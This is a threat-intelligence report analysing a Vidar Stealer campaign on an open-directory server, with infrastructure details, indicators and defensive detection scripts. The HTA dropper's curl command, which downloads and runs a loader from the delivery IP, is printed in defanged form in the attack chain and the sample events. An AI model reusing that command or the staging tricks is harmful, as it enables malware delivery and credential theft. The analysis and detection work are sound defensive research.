Severity: high | Category: Phishing

Open Directory, Open Season: Vidar Stealer Campaign Exposed on Latvian Bulletproof Infrastructure

Published: March 12, 2026
Tags: phishing, vidar, asyncrat, c2, spearphishing

TL;DR: A multi-stage Vidar Stealer campaign was identified operating from a fully exposed open directory on Podaon SIA (AS211381) VPS infrastructure in Germany. The operator left WebDAV write access enabled on the delivery server, exposing the entire payload set and upload methodology. Two parallel delivery chains were found: an HTA/VBScript dropper that downloads a Go-based loader (disguised as favicon.ico), and a CMD batch file that executes the Vidar stealer binary (disguised as digest.bin). The stealer masquerades as 7-Zip File Manager and targets browser credentials, cryptocurrency wallets, Telegram data, and system information. The Go loader (compiled with Go 1.25.0) uses heavily obfuscated function names mimicking Kubernetes and blockchain applications, with the revealing source path convicted/main.go. The same /24 subnet hosts AsyncRAT C2 infrastructure on a neighboring IP, indicating multi-campaign use of this hosting provider. As of March 10, 2026, all delivery infrastructure remains fully operational.


Key Findings

An Open Directory Full of Malware

The delivery server at 188.137.224[.]103 is running Apache 2.4.52 on Ubuntu with directory listing enabled and WebDAV methods active. Anyone browsing to the server's root can see the complete campaign payload set:

File          Last Modified       Size      Purpose
digest.bin    2026-03-07 16:55    1.1 MB    Vidar Stealer (masquerades as 7-Zip)
favicon.ico   2026-03-09 15:14    2.1 MB    Go-based loader/dropper
fix.cmd       2026-03-07 16:55    371 B     CMD batch dropper
verif.hta     2026-03-09 15:14    646 B     HTA/VBScript downloader

WebDAV methods are fully enabled: PUT, DELETE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE (an OPTIONS request against the document root returns them in the Allow header). Because nothing gates these methods, the operator can push a fresh payload with a single PUT and never needs SSH or RDP on the Linux delivery server. The same unauthenticated write access means anyone who finds the server can replace the payloads too, which is worth keeping in mind before attributing later content changes to the operator. The RDP-accessible Windows box at .92 in the same subnet is likely the operator's campaign management workstation.
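The two checks described above, listing enumeration and the WebDAV surface, as an added example (not tooling from this report). It parses the HTML that Apache mod_autoindex emits and the Allow header an OPTIONS request returns, then flags files fitting the masquerade pattern seen here. The listing, the Allow header, the extension lists and the 256 KiB decoy threshold are constructed assumptions so the script runs offline; against live attacker infrastructure, fetch both responses from an isolated analysis host and feed them in.

```python
"""Triage an exposed Apache directory listing and its WebDAV surface."""
import re
from dataclasses import dataclass
from html.parser import HTMLParser

# Methods whose presence in Allow means unauthenticated clients can modify content.
WEBDAV_WRITE = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE", "PROPPATCH"}
WEBDAV_ANY = WEBDAV_WRITE | {"PROPFIND", "LOCK", "UNLOCK"}
# Heuristics (assumptions for this example, not from the report): script
# droppers, and decoy extensions that should never be executable-sized.
SCRIPT_EXT = {".hta", ".cmd", ".bat", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".lnk"}
DECOY_EXT = {".ico", ".png", ".gif", ".jpg", ".jpeg", ".bmp", ".css", ".txt"}
DECOY_MAX_BYTES = 256 * 1024


@dataclass
class Entry:
    name: str
    modified: str
    size_bytes: int


def parse_size(text: str) -> int:
    """Apache prints sizes as 371, 1.1K, 2.1M, 1.0G; '-' for directories."""
    m = re.fullmatch(r"\s*(\d+(?:\.\d+)?)\s*([KMG]?)\s*", text)
    if not m:
        return 0
    mult = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[m.group(2)]
    return int(float(m.group(1)) * mult)


class AutoindexParser(HTMLParser):
    """Collects data rows of the mod_autoindex table: icon | name | date | size."""

    def __init__(self):
        super().__init__()
        self.entries = []
        self._row, self._cell, self._in_td = [], "", False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag == "td":
            self._in_td, self._cell = True, ""

    def handle_data(self, data):
        if self._in_td:
            self._cell += data

    def handle_endtag(self, tag):
        if tag == "td":
            self._row.append(self._cell.strip())
            self._in_td = False
        elif tag == "tr" and len(self._row) >= 4:
            name, date, size = self._row[1], self._row[2], self._row[3]
            if name and name != "Parent Directory" and not name.endswith("/"):
                self.entries.append(Entry(name, date, parse_size(size)))


def parse_listing(html: str) -> list:
    p = AutoindexParser()
    p.feed(html)
    return p.entries


def webdav_exposure(allow_header: str) -> dict:
    """Interpret the Allow header returned by an OPTIONS request."""
    methods = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    return {
        "webdav": bool(methods & WEBDAV_ANY),
        "writable": bool(methods & WEBDAV_WRITE),
        "write_methods": sorted(methods & WEBDAV_WRITE),
    }


def flag_suspicious(entries) -> dict:
    """Map file name -> reason for files that look like droppers or oversized decoys."""
    flagged = {}
    for e in entries:
        ext = e.name[e.name.rfind("."):].lower() if "." in e.name else ""
        if ext in SCRIPT_EXT:
            flagged[e.name] = "script dropper extension"
        elif ext in DECOY_EXT and e.size_bytes > DECOY_MAX_BYTES:
            flagged[e.name] = f"decoy extension but {e.size_bytes} bytes"
    return flagged


# Constructed sample: the report's four files in mod_autoindex markup.
SAMPLE_LISTING = """<html><body><h1>Index of /</h1><table>
<tr><th>&nbsp;</th><th><a href="?C=N;O=D">Name</a></th><th>Last modified</th><th>Size</th></tr>
<tr><td valign="top">&nbsp;</td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td></tr>
<tr><td valign="top">&nbsp;</td><td><a href="digest.bin">digest.bin</a></td><td align="right">2026-03-07 16:55  </td><td align="right">1.1M</td></tr>
<tr><td valign="top">&nbsp;</td><td><a href="favicon.ico">favicon.ico</a></td><td align="right">2026-03-09 15:14  </td><td align="right">2.1M</td></tr>
<tr><td valign="top">&nbsp;</td><td><a href="fix.cmd">fix.cmd</a></td><td align="right">2026-03-07 16:55  </td><td align="right">371</td></tr>
<tr><td valign="top">&nbsp;</td><td><a href="verif.hta">verif.hta</a></td><td align="right">2026-03-09 15:14  </td><td align="right">646</td></tr>
</table></body></html>"""
# Constructed sample: Allow header as Apache with mod_dav enabled returns it.
SAMPLE_ALLOW = "OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,PUT,MKCOL,LOCK,UNLOCK"

if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LISTING)
    for e in entries:
        print(f"{e.name:<14} {e.modified:<18} {e.size_bytes:>9}")
    print(webdav_exposure(SAMPLE_ALLOW))
    print(flag_suspicious(entries))
```

The decoy check is what surfaces favicon.ico here: a real favicon is a few kilobytes, and a 2.1 MB one on an otherwise empty document root is the loader. digest.bin is deliberately not flagged by extension alone, since .bin is ambiguous; it is the timestamp pairing with fix.cmd that ties it to the chain.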

Two Parallel Delivery Chains

The campaign uses two independent dropper mechanisms, likely for A/B testing or to target different victim scenarios:

Chain 1: HTA/VBScript (verif.hta)

  • Downloads favicon.ico (Go loader) via curl.exe -s -o
  • Saves to %TEMP%\svc22121d.exe
  • Executes via Shell.Application.ShellExecute
  • Self-closes to remove HTA window
  • 3-second delay via ping -n 3 127.0.0.1

Chain 2: CMD Batch (fix.cmd)

  • Copies digest.bin (Vidar stealer) to randomized temp path
  • Format: %TEMP%\u<random>\sv<random>t.exe
  • Falls back to xcopy if copy fails
  • Cleans up staged binary and temp directory after execution
  • 2-4 second delays between stages
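Endpoint detection logic for both chains, as an added example (not a rule set from this report). It evaluates a handful of behavioural rules over Sysmon-style process-creation events: the image, optionally the command line, and optionally any ancestor image, so the mshta.exe -> cmd.exe -> curl.exe case is still caught when the HTA goes through an intermediate shell. The events below are constructed, not real telemetry, and the field names and rule names are this example's own assumptions.

```python
"""Process-creation rules for the HTA/curl and CMD/xcopy delivery chains."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Each rule: regexes on image, command line, and any ancestor image (None = any).
RULES = {
    # Chain 1: HTA host (or a shell it spawned) running curl to drop into %TEMP%.
    "hta_curl_download_to_temp": dict(
        image=r"(?i)\\curl\.exe$",
        cmdline=r"(?i)\s-o\s+\S*(?:%TEMP%|\\Temp\\)",
        ancestor=r"(?i)\\mshta\.exe$",
    ),
    # Both chains: the report's staging paths, fixed and randomised.
    "vidar_staging_path": dict(
        image=r"(?i)\\Temp\\(?:u[0-9a-z]+\\sv[0-9a-z]+t|svc22121d)\.exe$",
        cmdline=None, ancestor=None,
    ),
    # Both chains: ping-to-loopback sleep launched from a script host or shell.
    "ping_loopback_sleep": dict(
        image=r"(?i)\\ping\.exe$",
        cmdline=r"(?i)-n\s+[2-9]\s+127\.0\.0\.1",
        ancestor=r"(?i)\\(?:mshta|cmd|wscript|cscript)\.exe$",
    ),
    # Chain 2: copy/xcopy renaming a .bin payload to .exe.
    "bin_copied_to_exe": dict(
        image=r"(?i)\\(?:cmd|xcopy)\.exe$",
        cmdline=r"(?i)\b(?:copy|xcopy)\b[^&|]*\.bin\b[^&|]*\.exe",
        ancestor=None,
    ),
}


def ancestors(ev: ProcEvent, by_pid: dict, max_depth: int = 8):
    """Yield parent, grandparent, ... while the chain is present in the data."""
    cur, depth = ev, 0
    while depth < max_depth and cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        yield cur
        depth += 1


def evaluate(events) -> dict:
    """Return {rule_name: sorted list of matching pids}."""
    by_pid = {e.pid: e for e in events}
    hits = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if not re.search(rule["image"], ev.image):
                continue
            if rule["cmdline"] and not re.search(rule["cmdline"], ev.cmdline):
                continue
            if rule["ancestor"] and not any(
                re.search(rule["ancestor"], a.image) for a in ancestors(ev, by_pid)
            ):
                continue
            hits[name].append(ev.pid)
    return {k: sorted(v) for k, v in hits.items()}


# Constructed events: one run of each chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    # Chain 1 (HTA)
    ProcEvent(100, 1, r"C:\Windows\System32\mshta.exe", r'mshta.exe "C:\Users\v\Downloads\verif.hta"'),
    ProcEvent(101, 100, r"C:\Windows\System32\cmd.exe", r"cmd /c curl.exe -s -o %TEMP%\svc22121d.exe hxxp://188.137.224[.]103/favicon.ico"),
    ProcEvent(102, 101, r"C:\Windows\System32\curl.exe", r"curl.exe -s -o C:\Users\v\AppData\Local\Temp\svc22121d.exe hxxp://188.137.224[.]103/favicon.ico"),
    ProcEvent(103, 100, r"C:\Windows\System32\PING.EXE", r"ping -n 3 127.0.0.1"),
    ProcEvent(104, 100, r"C:\Users\v\AppData\Local\Temp\svc22121d.exe", r"C:\Users\v\AppData\Local\Temp\svc22121d.exe"),
    # Chain 2 (CMD)
    ProcEvent(200, 50, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Users\v\Downloads\fix.cmd"'),
    ProcEvent(201, 200, r"C:\Windows\System32\xcopy.exe", r"xcopy /y digest.bin C:\Users\v\AppData\Local\Temp\u4f2a\sv9c1t.exe*"),
    ProcEvent(202, 200, r"C:\Windows\System32\PING.EXE", r"ping -n 4 127.0.0.1"),
    ProcEvent(203, 200, r"C:\Users\v\AppData\Local\Temp\u4f2a\sv9c1t.exe", r"C:\Users\v\AppData\Local\Temp\u4f2a\sv9c1t.exe"),
    # Benign: a developer's curl from a terminal, and an admin pinging a gateway.
    ProcEvent(300, 1, r"C:\Windows\System32\curl.exe", r"curl.exe -s -o C:\Users\v\Downloads\tool.zip https://example.com/tool.zip"),
    ProcEvent(301, 1, r"C:\Windows\System32\PING.EXE", r"ping -n 4 192.0.2.1"),
]

if __name__ == "__main__":
    for rule, pids in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule:<28} {pids}")
```

The ancestor walk is the part worth copying into a real rule: a parent-only check on curl.exe misses the run where the HTA's VBScript goes through cmd.exe, and the benign curl from a terminal is excluded by the drop-path condition rather than by the tool name.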

Go Loader: Kubernetes-Flavored Obfuscation

The Go-based loader (favicon.ico / cache.bin) is compiled with Go 1.25.0 and uses a distinctive two-layer obfuscation scheme:

Layer 1 -- Function Names: Gibberish English compound words designed to look like legitimate application code:

  • Congratulationsdisorders
  • Containerspediatric
  • Deliciousexpenditure
  • Differencesinstructional
  • Verificationefficiency

Layer 2 -- Type Names: Fake Kubernetes and blockchain type definitions:

  • Deployment, Pod, PodPhase, RestartPolicy, ResourceQuota, ScheduleResult
  • Wallet, Transaction, NodeID

This dual obfuscation is designed to make the binary appear as a legitimate container orchestration or blockchain application during casual analysis. However, the source path convicted/main.go and the preserved Go build ID (RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS) undermine this effort.

Multi-Campaign Infrastructure

The entire 188.137.224.0/24 subnet appears to be used for malicious purposes:

IP      Ports               Purpose
.103    80                  Vidar delivery server (open directory)
.92     3389                Operator RDP workstation
.125    6000                AsyncRAT C2 server
.94     443                 bestandzest[.]lol (suspicious domain)
.108    22, 80, 443         arrocagipplus[.]com (suspicious domain)
.96     3389                Windows RDP
.98     3389, 5986          Windows RDP + WinRM
.105    3389, 5986          Windows RDP + WinRM
.110    3389, 5357, 5986    Windows RDP + WinRM + WSDAPI

The AsyncRAT C2 at .125 on port 6000 is particularly notable: it shows the provider hosting more than one cybercrime campaign at the same time in the same /24. Whether one operator runs both, or the subnet is simply shared among like-minded tenants, cannot be decided from the infrastructure alone.


Attack Chain

Phase 1: Initial Access
  Victim receives link to delivery server
  (Exact delivery mechanism -- email, SEO poisoning, or malvertising -- TBD)
      |
      v
Phase 2A: HTA Delivery Path
  Browser opens verif.hta
  VBScript executes: curl.exe -s -o %TEMP%\svc22121d.exe
    hxxp://188.137.224[.]103/favicon.ico
  3-second delay (ping -n 3 127.0.0.1)
  ShellExecute launches svc22121d.exe
  HTA self-closes (Self.Close)
      |
      v
Phase 2B: CMD Delivery Path (alternate)
  fix.cmd batch script executes
  Creates randomized temp directory: %TEMP%\u<random>\
  Copies digest.bin to sv<random>t.exe (xcopy fallback)
  2-4 second delays between stages
  Executes renamed binary
  Cleans up: del /q + rmdir /q
      |
      v
Phase 3A: Go Loader Execution (from HTA path)
  Go 1.25.0 binary with obfuscated symbols
  XOR-decrypts embedded C2 URL
  Suspected dead-drop resolver (Steam/Telegram profile)
  Downloads and executes Vidar stealer
      |
      v
Phase 3B: Direct Stealer Execution (from CMD path)
  Vidar stealer runs directly
  Masquerades as 7-Zip File Manager v23.03
      |
      v
Phase 4: Data Collection
  Browser credentials (Chrome, Firefox, Opera, Brave, Edge)
  Cryptocurrency wallets (ETH, BTC, others)
  Telegram session data (tdata directory)
  System information (Computer, User, OS, CPU, RAM, PID)
  DPAPI secret extraction
  Files from Desktop, Documents, Downloads
      |
      v
Phase 5: Exfiltration
  Data staged and compressed
  HTTP POST to C2 server
  Session terminated

Infrastructure Analysis

Hosting Provider: Podaon SIA

The hosting provider is Podaon SIA, a Latvian company operating under the brand vps.ac:

Organization:  Podaon SIA
Address:       Ernesta Birznieka-Upisa 18, Riga, LV-1050, Latvia
ASN:           AS211381
Maintainer:    lir-lv-podaon-1-MNT
Created:       2022-11-29
Abuse Contact: abuse@podaon.com

Podaon announces 89 /24 prefixes via AS211381 -- a substantial allocation for a company that appears to be a low-profile VPS provider. The upstream transit providers include Serverius (AS50673), Speed-IX (AS41441), NovoEU (AS24875), NovoUS (AS939), and CloudK (AS200187).

The combination of factors -- large IP allocation, multiple transit providers, presence of multiple malware campaigns on the same /24, and lack of visible abuse response -- strongly suggests Podaon SIA operates as a bulletproof hosting provider or at minimum exercises negligible abuse enforcement.

Network Topology

Upstream Transit:
  Serverius (AS50673) ----+
  Speed-IX (AS41441) -----+
  NovoEU (AS24875) -------+--> AS211381 (Podaon SIA)
  NovoUS (AS939) ---------+        |
  CloudK (AS200187) ------+        +--> 89 x /24 prefixes
                                    |
                              188.137.224.0/24
                                    |
            +-------+-------+------+------+------+
            |       |       |      |      |      |
          .92     .94     .96    .98    .103   .105
         (RDP)  (domain) (RDP) (RDP)  (HTTP) (RDP)
                          .108   .110   .125
                        (domain)(RDP) (AsyncRAT)

Adjacent Domains

Two suspicious domains were discovered on neighboring IPs:

Domain                 IP                  Registrar          Created       Status
bestandzest[.]lol      188.137.224[.]94    Joker (CSL GmbH)   2026-02-15    DEAD (SERVFAIL)
arrocagipplus[.]com    188.137.224[.]108   Namecheap          2026-02-04    LIVE (Cloudflare proxied)

Both domains were registered within weeks of the Vidar campaign setup (February 2026) and are hosted on the same /24 subnet, suggesting they are either part of the same operation or operated by a co-tenant on the infrastructure.

Open Directory as Intelligence Source

The open directory is an unusual intelligence gift. The file timestamps reveal the operator's workflow:

  1. March 7, 16:55 -- Initial campaign setup: digest.bin (Vidar stealer) and fix.cmd (CMD dropper) uploaded
  2. March 9, 15:14 -- Second wave: favicon.ico (Go loader) and verif.hta (HTA dropper) uploaded, adding the Go loader delivery path

The two-day gap between uploads suggests the operator tested the CMD/direct delivery path first, then added the HTA/Go loader path as a second channel -- possibly after encountering detection or delivery issues with the simpler approach.


Malware Technical Analysis

Vidar Stealer (digest.bin)

Property       Value
SHA-256        76005b67d11c0e89c76655b2ddc16f5bb778ee547f2a4c6fc2e2e1d7e2dde7d9
File Type      PE32+ executable (x64)
Size           1,196,544 bytes
Compiler       GCC 14.1.0 (Mingw-w64)
Compilation    2026-02-20
Imphash        2f611bc63293ca885a70090be8df0f3b
Sections       10 (.text, .data, .rdata, .pdata, .xdata, .bss, .idata, .tls, .rsrc, .reloc)
Imports        KERNEL32.dll, msvcrt.dll only

Masquerade Identity: The VERSION resource claims to be "7-Zip File Manager" v23.03 by Igor Pavlov. The masquerade gives the process a plausible name in Task Manager and may slip past allowlisting rules keyed on file name or path. It does nothing against publisher- or hash-based allowlisting, because a VERSION block is only metadata; conversely, a binary whose VERSION strings name Igor Pavlov but whose hash matches no 7-Zip release is itself a cheap detection.

Minimal Import Table: Only KERNEL32.dll and msvcrt.dll are statically imported, so every other Windows API the stealer needs (SQLite database access, DPAPI, networking) must be resolved at runtime, typically through LoadLibrary/GetProcAddress or API hashing. A static import view of this binary therefore looks like a console utility, and the capability list below comes from strings rather than imports. This is a hallmark of modern information stealers designed to evade import-based detection heuristics.

Data Collection Capabilities (extracted from .rdata format strings):

  • Browser credentials: Browsers/%s/%s/%s, cookies.sqlite, places.sqlite, Web Data -- targets Chrome, Firefox, Opera, Brave, Edge
  • Cryptocurrency wallets: Wallets/%s, Ethereum.docx -- harvests wallet files and seed phrases
  • Telegram data: Telegram/tdata -- steals session files for account hijacking
  • System fingerprinting: Collects Computer name, User name, OS version, CPU core count, RAM size, PID
  • DPAPI secrets: Extracts Windows Data Protection API-protected credentials
  • File collection: Harvests files from Desktop, Documents, and Downloads directories

Anti-Analysis: A 1.1MB block of word salad text is embedded in the RCDATA resource section. The text begins with "come management color face extension parser once order side they analyzer mark" and continues with randomized English words. The padding serves two purposes: it inflates the file past the size limits that make some sandboxes skip or shorten analysis, and it drags whole-file entropy down so the sample does not trip the high-entropy heuristics used to flag packed binaries. Per-section or sliding-window entropy is unaffected by the trick and still exposes the real code.
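The entropy effect described above, as an added example (not analysis code from this report). It builds a constructed file from a high-entropy 64 KiB blob standing in for the real code, followed by 512 KiB of word salad generated from a fixed word list (the report's opening words plus filler), then compares the whole-file Shannon entropy with a sliding-window scan. The 7.2 bits/byte threshold and the window size are this example's assumptions.

```python
"""Whole-file versus per-window entropy on a padded sample."""
import hashlib
import math
import random
from collections import Counter

WORDS = ("come management color face extension parser once order side they "
         "analyzer mark value table index record stream cache module event "
         "window buffer filter signal format handle option result").split()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pseudo_random_blob(size: int, seed: bytes = b"vidar-demo") -> bytes:
    """Deterministic high-entropy bytes from a SHA-256 chain (stand-in for packed code)."""
    out, block = bytearray(), seed
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:size])


def word_salad(size: int, seed: int = 1) -> bytes:
    """Low-entropy English-word filler, deterministic for a given seed."""
    rng = random.Random(seed)
    out, total = [], 0
    while total < size:
        w = rng.choice(WORDS)
        out.append(w)
        total += len(w) + 1
    return " ".join(out).encode()[:size]


def build_padded_sample(code: int = 64 * 1024, padding: int = 512 * 1024) -> bytes:
    return pseudo_random_blob(code) + word_salad(padding)


def windowed_entropy(data: bytes, window: int = 4096) -> list:
    """Entropy per fixed-size window; the maximum is what a packer check should use."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def entropy_report(data: bytes, threshold: float = 7.2) -> dict:
    whole = shannon_entropy(data)
    windows = windowed_entropy(data)
    return {
        "whole_file": round(whole, 3),
        "max_window": round(max(windows), 3),
        "whole_file_flags": whole >= threshold,   # the verdict the padding is meant to defeat
        "any_window_flags": max(windows) >= threshold,
    }


if __name__ == "__main__":
    print(entropy_report(build_padded_sample()))
```

With these proportions the whole-file figure lands around 5 bits/byte, well under any packed-binary threshold, while the first sixteen windows still read close to 8. Triage tooling that computes entropy per section (or per window) is therefore the right check; the whole-file number is exactly what the RCDATA padding is designed to game.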

Go Loader (favicon.ico / cache.bin)

Property        Value
SHA-256         1c83863bda00873d081eb525fff37080a4b262a9092ca00887ba56234b860273
File Type       PE32+ executable (x64, Go)
Size            2,165,248 bytes
Go Version      go1.25.0
Source Path     convicted/main.go
Build ID        RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS
Imphash         d42595b695fc008ef2c56aabd8efd68e
PE Timestamp    Epoch 0 (zeroed)

31 symbols were recovered from the preserved symbol table (Go function symbols, not PE exports; a binary linked with -ldflags="-s -w" would not carry them):

Core functions:

  • main.main -- Entry point
  • main.init -- Initialization
  • main.Changelog (with nested closures .func1, .func1.1, .func1.2) -- Likely core C2/loader logic

Obfuscated functions:

  • main.Congratulationsdisorders
  • main.Containerspediatric
  • main.Deliciousexpenditure
  • main.Differencesinstructional
  • main.Verificationefficiency
  • (and 20+ additional compound-word names)
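The metadata in the table and the symbol list above can be pulled from an unstripped Go binary without running it. The following is an added example (not tooling from this report) that relies on two layout facts: the Go linker writes the build ID into the start of the text section as `\xff Go build ID: "<id>"\n \xff` (the string `go tool buildid` reads), and unless the binary is linked with -ldflags="-s -w" the runtime version string, the pclntab file names and the symbol names survive as plain ASCII. Symbol recovery here is a regex heuristic, not a COFF symbol-table parser. The sample image is constructed; the build ID, source path and symbol names are the ones quoted in this report.

```python
"""Recover Go linker metadata (build ID, version, file names, main.* symbols)."""
import re

BUILD_ID_RE = re.compile(rb'\xff Go build ID: "([^"\n]{1,200})"\n \xff')
GO_VERSION_RE = re.compile(rb'\bgo1\.\d{1,3}(?:\.\d{1,3})?(?:rc\d|beta\d)?\b')
GO_FILE_RE = re.compile(rb'[A-Za-z0-9_./-]{1,160}\.go\b')
# Lookbehind keeps "convicted/main.go" from being read as a symbol named main.go.
MAIN_SYMBOL_RE = re.compile(rb'(?<![\w./-])main\.[A-Za-z_][A-Za-z0-9_.]{0,80}')

REPORT_BUILD_ID = ("RMg_dsFz6-8NMT9j_5pE/oJNfwy1xvjGuk4Jgf6F3/"
                   "ZoIdinksb3mQHLVWHEFw/wUsEim1Jv2_CPamZYTXS")


def extract_go_metadata(image: bytes) -> dict:
    m = BUILD_ID_RE.search(image)
    build_id = m.group(1).decode() if m else None
    return {
        "build_id": build_id,
        # Four slash-separated hashes; the same source, toolchain and flags
        # reproduce it, so it pivots across re-uploads of one project.
        "build_id_parts": build_id.split("/") if build_id else [],
        "go_versions": sorted({v.decode() for v in GO_VERSION_RE.findall(image)}),
        # pclntab file names; standard-library entries appear here as well.
        "source_files": sorted({p.decode() for p in GO_FILE_RE.findall(image)}),
        "main_symbols": sorted({s.decode() for s in MAIN_SYMBOL_RE.findall(image)}),
    }


def build_sample_image() -> bytes:
    """Constructed stand-in for the loader: PE magic, the build ID as the linker
    lays it out, then a few runtime, pclntab and symbol-table strings."""
    return (
        b"MZ" + b"\x00" * 62
        + b'\xff Go build ID: "' + REPORT_BUILD_ID.encode() + b'"\n \xff'
        + b"\xcc" * 16
        + b"go1.25.0\x00"
        + b"runtime/proc.go\x00convicted/main.go\x00"
        + b"main.main\x00main.init\x00main.Changelog.func1\x00"
        + b"main.Containerspediatric\x00main.Verificationefficiency\x00"
    )


if __name__ == "__main__":
    for k, v in extract_go_metadata(build_sample_image()).items():
        print(f"{k:<15} {v}")
```

On a real sample, run the same function over the whole file read as bytes; the build ID, the odd main-module path and the compound-word symbol names are the pivots a YARA rule or a MalwareBazaar search should key on, as the detection section below does.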

C2 Resolution: MalwareBazaar YARA matches (SUSP_XORed_URL_In_EXE) confirm XOR-encoded URL prefixes in the binary. The full C2 string did not yield to simple static extraction, which points to a multi-byte XOR key or a stream cipher such as RC4 for the working URL; RC4 is a keystream XOR rather than a fixed key, so a one-byte brute force cannot unwind it and emulation or a debugger is needed. The dead-drop resolver pattern, where the actual C2 URL is retrieved from a legitimate service such as a Steam profile or Telegram channel, is suspected but unconfirmed without dynamic analysis.
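The static check described above, and the reason it stalls on a longer key, as an added example (not the loader's code and not the YARA rule itself). single_byte_xor_urls reproduces the approach behind generic rules such as SUSP_XORed_URL_In_EXE: xor "http://" and "https://" with every one-byte key and look for the result. repeating_key_xor_urls is a known-plaintext extension for short repeating keys, the case the single-byte check misses. The loader's real scheme is not known from this report, and a stream cipher is not recoverable this way at all. The sample image is constructed, using RFC 5737 documentation addresses and NUL-terminated strings for determinism.

```python
"""Search a binary image for XOR-encrypted URLs with single-byte and short repeating keys."""
PREFIXES = (b"https://", b"http://")


def _printable(c: int) -> bool:
    return 0x21 <= c <= 0x7E  # visible ASCII; a URL never contains anything else


def _decode_run(data: bytes, start: int, key: bytes, min_len: int):
    """Decode forward with a repeating key until the first non-printable byte."""
    out = bytearray()
    for j in range(start, len(data)):
        c = data[j] ^ key[(j - start) % len(key)]
        if not _printable(c):
            break
        out.append(c)
    return bytes(out) if len(out) >= min_len else None


def single_byte_xor_urls(data: bytes) -> list:
    """(offset, key, url) for every URL prefix XORed with one byte in data."""
    hits = []
    for key in range(1, 256):
        for prefix in PREFIXES:
            needle = bytes(b ^ key for b in prefix)
            pos = data.find(needle)
            while pos != -1:
                url = _decode_run(data, pos, bytes([key]), len(prefix) + 4)
                if url:
                    hits.append((pos, key, url))
                pos = data.find(needle, pos + 1)
    return hits


def repeating_key_xor_urls(data: bytes, min_tail: int = 8) -> list:
    """Known-plaintext attack for repeating keys no longer than the prefix.

    At each offset, assume the plaintext starts with a URL prefix; XORing gives
    the first len(prefix) key bytes. Keep the shortest period L consistent with
    those bytes whose continuation decodes to min_tail more printable bytes.
    Expect false candidates on a real image; rank by decoded length.
    """
    hits = []
    for prefix in PREFIXES:
        plen = len(prefix)
        for pos in range(len(data) - plen + 1):
            k = bytes(data[pos + j] ^ prefix[j] for j in range(plen))
            if not any(k):
                continue  # zero key: the URL is already plaintext
            for L in range(1, plen + 1):
                if any(k[j] != k[j % L] for j in range(plen)):
                    continue
                url = _decode_run(data, pos, k[:L], plen + min_tail)
                if url:
                    hits.append((pos, k[:L], url))
                    break
    hits.sort(key=lambda h: -len(h[2]))
    return hits


def build_sample_image() -> bytes:
    """Filler with no two equal adjacent bytes (so it can never contain a XORed
    'http' needle), plus one single-byte and one three-byte XORed URL."""
    filler = bytes((i * 73 + 11) & 0xFF for i in range(512))
    url1 = b"http://198.51.100.7/loader/cache.bin\x00"
    url2 = b"https://203.0.113.9/panel/gate.php\x00"
    enc1 = bytes(b ^ 0x5A for b in url1)
    key2 = b"\x13\x37\xC0"
    enc2 = bytes(b ^ key2[i % len(key2)] for i, b in enumerate(url2))
    return filler + enc1 + filler[::-1] + enc2 + filler


if __name__ == "__main__":
    img = build_sample_image()
    print("single-byte:", single_byte_xor_urls(img))
    print("repeating  :", repeating_key_xor_urls(img)[:3])
```

The single-byte pass recovers the first URL and is blind to the second; the known-plaintext pass recovers both because a three-byte period is consistent with the eight key bytes that "https://" gives away. Neither helps when the keystream never repeats, which is the RC4 case and the point at which static extraction gives way to emulation.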

Anti-Debug: YARA matches for five generic anti-debugging signatures. These rules key on API names and code patterns rather than observed behaviour, so they indicate capability, not confirmed use:

  • DebuggerCheck__API -- Uses IsDebuggerPresent or CheckRemoteDebuggerPresent
  • DebuggerCheck__QueryInfo -- Queries NtQueryInformationProcess
  • DebuggerCheck__RemoteAPI -- Checks for remote debugger attachment
  • DebuggerException__SetConsoleCtrl -- Exception-based debugger detection
  • DebuggerHiding__Active -- Active debugger evasion

HTA Dropper (verif.hta)

The 646-byte HTA file is minimal but effective:

Delivery URL:  hxxp://188.137.224[.]103/favicon.ico
Download tool: curl.exe (ships with Windows 10 1803 and later)
Arguments:     -s (silent) -o (output to file)
Drop path:     %TEMP%\svc22121d.exe
Execution:     Shell.Application.ShellExecute
Evasion:       Self.Close (removes HTA window)
Delay:         ping -n 3 127.0.0.1 (3-second pause)

The use of curl.exe rather than certutil, bitsadmin, or powershell for the download is notable: curl.exe is used legitimately often enough on modern Windows that LOLBin-focused rules rarely flag it on its own. The useful signal is the process lineage, since mshta.exe (directly or through cmd.exe) spawning curl.exe with -o into %TEMP% has essentially no legitimate use.

CMD Dropper (fix.cmd)

The 371-byte batch file implements several anti-forensics techniques:

Staging:       Creates unique temp directory (%TEMP%\u<random>\)
Copy method:   copy command with xcopy fallback
Filename:      sv<random>t.exe (randomized)
Cleanup:       del /q (silent delete of executable)
               rmdir /q (remove temp directory)
Delays:        ping -n 2/4 127.0.0.1 (2-4 second pauses)

